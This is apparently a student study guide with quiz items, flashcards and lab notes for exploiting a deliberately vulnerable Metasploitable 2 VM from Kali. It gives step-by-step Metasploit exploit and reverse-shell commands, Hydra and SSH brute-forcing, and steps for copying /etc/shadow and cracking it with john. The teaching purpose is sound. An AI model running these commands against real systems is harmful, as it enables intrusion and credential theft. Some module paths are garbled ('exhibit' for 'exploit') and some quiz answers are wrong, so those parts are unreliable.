Attacker Techniques with Metasploit

Questions and Answers

Which of the following best describes the primary function of the Metasploit Framework?

• A database of known system vulnerabilities.
• A method for securely patching operating system vulnerabilities.
• A collection of penetration-testing tools used to exploit vulnerabilities. (correct)
• A tool for creating virtual machines with security vulnerabilities.

What primary action does a Metasploit 'exploit' module perform?

• Takes advantage of a known vulnerability to install a payload. (correct)
• Analyzes network traffic for malicious activity.
• Blocks unauthorized access attempts to a system.
• Encrypts data transmitted across a network.

In Metasploit terminology, what is the purpose of a 'payload'?

• To provide initial access to a target system via various methods. (correct)
• To encrypt communications between systems.
• To scan a system for open ports and services .
• To identify software versions.

What is the main purpose of Metasploitable 2 in a penetration testing environment?

It acts as a deliberately vulnerable target for testing exploits. (B)

Why should one exercise caution when downloading exploits from sources other than the Offensive Security Exploit Database?

Exploits from unofficial sources may contain malicious code. (A)

In the Metasploit console, what is the function of the back command?

It returns the prompt to the previous level or module. (D)

What is a Common Vulnerability and Exposure (CVE) identifier?

A unique identification number assigned to a known vulnerability. (D)

What is the primary function of vulnerability databases in penetration testing?

To provide a record of known vulnerabilities for researching potential exploits. (A)

What is the purpose of the Searchsploit tool in Kali Linux?

To search an offline database of exploits for known vulnerabilities. (C)

After identifying open ports and services, what is the next logical step in a penetration test?

Conducting vulnerability analysis to find potential exploits. (A)

In the command ping <ip address>, what does the <ip address> argument represent?

The IP address of the target machine. (A)

What command is used to access the Metasploit console in Kali Linux?

msfconsole (D)

In Metasploit, after selecting an exploit, what command displays the configurable options for that module?

show options (D)

What is the purpose of the command set rhosts <ip address> in Metasploit?

To specify the IP address of the target system. (A)

What command is executed in Metasploit to initiate an exploit after configuring its options?

exploit (D)

After successfully exploiting a target with Metasploit and obtaining a shell, what commands can be used to gather information about the compromised system?

ifconfig and whoami (C)

Which tool is mentioned for brute-forcing password-protected services such as FTP, SSH, Telnet, and MySQL?

Hydra (C)

When using Hydra for brute-forcing, what type of files are used for username and password lists?

Text files (D)

What Metasploit module is used to perform brute-force login attempts against SSH?

auxiliary/scanner/ssh/ssh_login (A)

What is the purpose of the sessions command in Metasploit?

To manage and interact with active Meterpreter sessions. (D)

What is the purpose of the Smtp-User-Enum tool?

To verify if a username is on a target (D)

What is PHP mainly used for?

Scripting language used extensively in web development (C)

What is Samba primarily used for?

Inter-process communication protocol used by networked computers (D)

Java classes are mainly used for?

Constructing objects with attributes (D)

What networking tool can be used for TCP port connections?

Netcat (B)

The command showmount –e <ip address> is primarily used

To see the Metasploitable 2 VM's NFS export list (D)

What does SQL, extract, create or modify?

Structured data from the MSQL tables (C)

What is the purpose of VNC?

Graphical desktop-sharing (D)

What is UnrealIRCd?

Text messaging via Internet Relay Chat (IRC) (B)

After successfully mounting the target's file system via NFS, which command allows you to change the current directory to a specific location within the mounted file system?

cd (A)

In a Linux system, which file typically contains a list of all user accounts on the system?

/etc/passwd (B)

In a Linux system, which file typically that stores encrypted password?

/etc/shadow (C)

What is the purpose of the john command?

Password cracking (B)

After cracking password hashes, what protocol is used in the material for the password?

SSH (D)

Flashcards

Metasploit Framework

An open-source resource containing penetration-testing tools bundled with Kali VM, offering exploits for various applications, operating systems, and platforms.

Exploit

Takes advantage of a vulnerability to install a payload.

Payload

Gives access to a target through methods like reverse shell or Meterpreter.

Metasploit

A penetration-testing resource to exploit vulnerabilities.

Metasploitable

Linux VM with weaknesses for testing.

Meterpreter

A dynamically extensible Metasploit attack payload that uses in-memory DLL injection.

Vulnerability databases

A resource of data for software/services to find vulnerabilities.

Searchsploit

Kali tool to find off-line vulnerabilities.

Hydra

Tool to brute-force password-protected services through username and password lists.

Smtp-user-enum

Used to see if accounts exist on the target.

mkdir /metafs

Used to create a mount point.

mount -t nfs :/ /metafs -o nolock

Used to mount the target Metasploitable directory.

sudo john --show shadow.txt

Used to crack password hashes.

Study Notes

• This activity guides you through an afternoon's practical session for identifying attacker techniques.
• The practical session will cover Metasploit Framework/Meterpreter, Vulnerability Databases, Vulnerability Analysis and System Access, and Lateral Movement and Privilege Escalation.
• You need a Kali VM as the attacking machine and a Metasploitable 2 VM as the target.
• The Metasploitable 2 VM has intentional vulnerabilities for practicing exploit testing and enhancing penetration-testing skills.
• Multiple methods may exist to exploit a vulnerability or achieve the same objective.

Recap on Active Reconnaissance

• Active reconnaissance on the Metasploitable 2 VM provides information on open ports, running services, software versions, and the operating system.
• The nmap service version detection scan gives information about which services are running

Metasploit Framework

• The Metasploit Framework found at (https://tools.kali.org/exploitation-tools/metasploit-framework) has penetration-testing tools bundled with Kali VM, and contains exploits for applications, OSes, and platforms.
• The Metasploit Framework is entered with the command msfconsole in the Kali terminal.
• The six main Metasploit modules are Exploits, Payloads, Auxiliary, Nops, Post, and Encoders.
• Exploits take advantage of vulnerabilities and install a payload.
• Payloads provide access to a target, like a reverse shell or Meterpreter.
• Metasploit is a resource, and Metasploitable is a vulnerable Linux VM to test penetration tools and skills.
• References to Metasploit come up when searching for known vulnerabilities.
• Exploits for vulnerabilities may need to be downloaded and added to Metasploit.
• To move up a level in Metasploit, the prompt use back.
• To exit Metasploit from the Kali terminal, use exit.
• The command for setting host IP addresses can be either rhosts or rhost.

Meterpreter

• Meterpreter (Metasploit Interpreter) is a dynamically extensible Metasploit attack payload.
• It enables screen control using VNC and interactive shell file browsing.
• Some Metasploit exploits need upgrading Metasploit, producing a Meterpreter 'session'.
• When upgraded the console prompt will change from msf6 > to meterpreter >.

Vulnerability Databases

• Vulnerability databases collate, maintain, and disseminate computer security vulnerabilities.
• They are a key resource for researching software/services during active reconnaissance.
• Vulnerabilities are assigned a Common Vulnerability and Exposures (CVE) Identifier.
• Common Vulnerabilities, Exposures (http://cve.mitre.org/index.html)
• Offensive Security Exploit Database (https://www.exploit-db.com/)
• Rapid7 Vulnerability,Exploit Database (https://www.rapid7.com/db/?type=nexpose)
• NIST National Vulnerability Database (https://nvd.nist.gov/vuln/search)

Searchsploit

• Kali has its own offline vulnerability resource called Searchsploit, available from the terminal prompt.

Vulnerability Analysis & System Access - Kali and Metasploitable Setup

• Log into the Kali VM using kali for both username and password.
• Start the Metasploitable 2 VM and minimize it at the metasploitable login: prompt without logging in, to access it from the Kali VM.
• Use the command ping <ip address> in Kali to check if the Metasploitable 2 VM is visible, and its address, adjusting network adapter settings to NAT if needed.

Task 1: Port 21 - vsftpd 2.3.4 Exploit

• Port 21 is for FTP communications, with vsftpd meaning 'Very Secure FTP Daemon’.
• Enter vsftpd 2.3.4 into the search bar on the Exploit Database website (https://www.exploit-db.com/) and select a metasploit exploit to utilize the vsftpd 2.3.4
• A metasploit will be used to execute a backdoor command
• The exploit can be executed through a remote connection using the Kali VM via Port 21.
• Access Metasploit through Kali via the command msfconsole.
• Search for the exploit to find through Metasploit by typing the command search vsftpd.
• Load and execute the exploit with use exploit/unix/ftp/vsftpd_234_backdoor.
• List available configuration options by using show options at the Metasploit terminal prompt.
• Set required target IP address parameter by using set rhosts <ip address>.
• Run the exploit by entering exploit.
• The configured exploit executes and spawns a backdoor service, opening a shell session on the target Metasploitable 2 VM.
• Run the command ifconfig and whoami to confirm the location and privileges.
• Useexit and thenback to return to Metasploit's root console prompt.

Task 2: Port 21 - Hydra

• Hydra is used with username and password lists to brute force services like FTP.
• Create text files for username (user.txt) and password (pass.txt) lists on the Kali desktop.
• Open a Kali terminal prompt and input the command hydra -L user.txt -P pass.txt ftp
• Connect to Metasploitable 2 VM, then enterftp <ip address>, using the first credential, msfadmin for the username and password when requested, verifying the FTP connection.
• Use Exit to return to the Kali terminal prompt.

Task 3: Port 22 – SSH

• The Metasploit ssh_login exploit will use a brute-force technique with the user.txt and pass.txt files made earlier to generate a session.
• In a Kali terminal running metasploit, use use auxiliary/scanner/ssh/ssh_login.
• Use show options command to see available options.
• It will be set the the rhosts <ip address>, user_file /home/kali/Desktop/user.txt and pass_file /home/kali/Desktop/pass.txt.
• Run the exploit by using the command exploit.
• Access the Meterpreter session through sessions .
• Confirm through the command ifconfig and whoami.
• Confirm location and privilege, with exit then back to return to root.

Task 4: Port 23 – Linux telnetd

• The Metasploit telnet_login module is used to log into Linux telnetd on Port 23.
• At the Kali terminal prompt, initiate Metasploit, enter use auxiliary/scanner/telnet/telnet_login followed by show options.
• Configure, with the commandrhosts <ip address>, thenset user_file /home/kali/Desktop/user.txt, and thenset pass_file /home/kali/Desktop/pass.txt, then run the exploit by typing exploit
• Use command sessions , andifconfig and whoami.

Task 5: Port 25 - SMTP User Enumeration

• The Kali Smtp-User-Enum tool will verify a username on a target, and using the command`sudo apt install smtp-user-enum to install this tool.
• Change directory to the Desktop then enter smtp-user-enum -M VRFY -U user.txt -t

Task 6: Port 80 – PHP CGI

• PHP is a web development scripting language that can be embedded into HTML.
• An adversary can embed malicious code to exploit a client system by inserting a payload into PHP to exploit the client system.
• Access port 80 using the Kali Web Browser by inputting the IP address of Metasploitable via the address bar.
• To view the PHP version information, enter /phpinfo.php via the browser.
• Initiate Metasploit with the msfconsole command.

PHP CGI continued

• Enter the following in sequence:
  • use exploit/multi/http/php_cgi_arg_injection
  • set payload generic/shell_reverse_tcp
  • set rhost <target ip address>
  • set lhost <your kali ip address>
  • exploit
• Run ls to confirm location, and then exit Ctrl-C, y, back to return to root.

Task 7: Ports 139 or 445 – Samba

• Samba is an inter-process communication protocol that is vulnerable to attack if a systems administrator has failed.
• With Metasploit enter the folllowing:
  • use exploit/multi/samba/usermap_script
  • set rhost
  • exploit
• Confirm access using ifconfig and whoami.
• Use quit followed by back to return to the root Metasploit console prompt.

Task 8: Port 1099 – Java

• Use the code below to exploit Java:
  • use exhibit/multi/misc/java_rmi_server
  • set rhost 
  • exploit
• You can confirm access using thesysinfo command.

Task 9: Port 1524 – Bindshell

• Use this method to exploit this port
• Enter the command nc <ip address> 1524, then confirm with ifconfig and whoami.
• Use exit to return to the Kali terminal prompt.

Task 10: Port 2049 - nfs

• Shows info on what is shared and mounted -Enter the commandshowmount -e <ip address>, where "-e" specifies we want to view exports. This tells which VMs root directory is being shared
• Complete the attack with these commands:
  • sudo mkdir /metafs
  • sudo mount -t nfs :/ /metafs -o nolock

Task 11: Port 3306 – MySQL

• Run this command:
• use exhibit/scanner/mysql/mysql_version
• set RHOST <ip address>
• exploit
• The MySQL database in Metasploitable 2 has no password protection, access it with the command mysql -u root -h -p

Task 12: Port 5432 – Postgres

• Exploit Postgres with this metehod:
  • use exhibit/linux/postgres/postgres_payload
  • set rhost <ip address>
  • exploit
• Gain access using the sysinfo command.

Task 13: Port 5900 – VNC

• The port which extract login,
• First use these command with MetaSploit.
  • use exhibit/scanner/vnc/vnc_login
  • set RHOSTS <ip address>
  • exploit
• And try these command
• At the Kali terminal prompt, entervncviewer <ip address>, after vncviewer opens
• Enter Password that you get using MetaSpoilt.
• Then user can use that VNC Viewer screen of the target Metasploitable 2 VM through command below ifconfig and whoami commands

Task 14: Port 6667 – UnrealIRCD

• A malicious backdoor was added to version 3.2.8.1 in November 2009 and was not patched until June 2010
• Use these step on MetaSploit
  • use exhibit/unix/irc/unreal_ircd_3281_backdoor
  • set RHOST <ip address>
  • set payload cmd/unix/reverse
  • set lhost <kali ip address>
  • Exploit
• Final result can find using command following
  • ifconfig and whoami commands

Task 15: Port 8180 – Apache Tomcat

• Exploiting through Default Passwords, follow the steps
  • use exhibit/multi/http/tomcat_mgr_upload
  • set RHOST <ip address>
  • set rprot 8180
  • set username tomcat
  • set Password tomcat
  • Exploit
• Command for final stage withsysinfo command and after that command show below getuid

Lateral Movement & Privilege Escalation

• Use different techniques to obtain access after this exploitation
• Use the command cd and ls commands, but ls -a is, also useful for including hidden files
• Command for checking target is cd /metafs/etc ls -a can be used cat passwd, to get password with account system
• After this process. user can follow password with account system
  • Open pad on Kali
  • Copy password list that user got from the system
  • Then save with the name user choice.txt
  • Need to get password hashes, look at following step - sudo cat shadow After get password we can do, cracking password like this step

Hacking Password

• After copy on Kali, then paste Data on shadow txt.
• Use some command follow
  • cd desktop
  • sudo john –show shadow.txt
• After find everything then try the command

ssh -I sys <ip address>.